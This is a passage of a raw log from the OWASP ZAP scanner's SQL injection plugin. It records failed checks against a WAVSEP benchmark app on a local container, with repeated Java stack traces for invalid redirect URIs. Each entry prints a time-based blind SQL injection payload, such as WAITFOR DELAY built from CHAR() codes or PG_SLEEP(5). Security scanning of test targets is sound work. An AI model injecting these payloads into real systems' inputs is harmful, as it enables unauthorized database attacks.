CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (2839=2839 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681722 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6893=(SELECT 6893 FROM PG_SLEEP(5))-- Lock] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6893=(SELECT 6893 FROM PG_SLEEP(5))-- Lock at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681723 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (3930=3930] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (3930=3930 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681724 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681725 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681725 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('NdEB'='NdEB] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('NdEB'='NdEB at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681727 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'MujV'='MujV] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'MujV'='MujV at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681727 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('VzLl'='VzLl] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('VzLl'='VzLl at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681728 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681729 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'tuuJ'='tuuJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'tuuJ'='tuuJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681730 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- Ljcm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- Ljcm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681730 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681731 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- MTTg] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- MTTg at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown 